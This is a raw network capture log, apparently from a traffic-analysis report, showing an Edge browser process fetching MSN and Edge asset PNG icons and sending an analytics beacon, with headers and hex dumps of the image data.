                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 01:11:09 GMT
                                                                                                                                                                                                                                                                                                                    X-Datacenter: westus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: d1332dc8-9c45-4f85-a99f-4fe76a720ba2
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 1658
                                                                                                                                                                                                                                                                                                                    Content-Length: 1658
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=104498
                                                                                                                                                                                                                                                                                                                    Expires: Thu, 28 Nov 2024 13:08:28 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC1658INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    97192.168.2.749882104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC633OUTGET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT
                                                                                                                                                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 1218
                                                                                                                                                                                                                                                                                                                    Content-Length: 1218
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=236913
                                                                                                                                                                                                                                                                                                                    Expires: Sat, 30 Nov 2024 01:55:23 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC1218INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    98192.168.2.749879104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC634OUTGET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G
                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 18:14:45 GMT
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 5699
                                                                                                                                                                                                                                                                                                                    X-Datacenter: eastus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 5c4ddcbc-0d99-4ea0-a3c4-13e18d04c61f
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Length: 5699
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=122808
                                                                                                                                                                                                                                                                                                                    Expires: Thu, 28 Nov 2024 18:13:38 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC5699INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    99192.168.2.749878104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC634OUTGET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 17 Nov 2024 01:27:48 GMT
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Datacenter: eastus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 4e8f5161-6e89-49b3-b675-e3ba25e83bf7
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 6962
                                                                                                                                                                                                                                                                                                                    Content-Length: 6962
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=321652
                                                                                                                                                                                                                                                                                                                    Expires: Sun, 01 Dec 2024 01:27:42 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC6962INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.*v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~*DZQ[L*1@Gxg)qg(nMb<


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    100192.168.2.749880104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC634OUTGET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Nov 2024 21:15:54 GMT
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 3765
                                                                                                                                                                                                                                                                                                                    X-Datacenter: westus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: f3e4c9dc-fa16-4ee6-89a5-1e9169e1c90d
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Length: 3765
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=220262
                                                                                                                                                                                                                                                                                                                    Expires: Fri, 29 Nov 2024 21:17:52 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC3765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 01 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 3e 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR22?gAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    101192.168.2.74987513.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1154
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBD5935D5B3965
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 19199b86-801e-001b-0191-404695000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080650Z-174f7845968kvnqxhC1EWRmf3g0000000fh0000000001xf6
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    102192.168.2.74987613.107.246.404438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                    Content-Length: 1468
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: c5d67d76-a01e-0061-4a7f-402cd8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080650Z-174f7845968jrjrxhC1EWRmmrs0000000wu0000000004c09
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    103192.168.2.749884108.139.47.334438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC1012OUTGET /b2?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
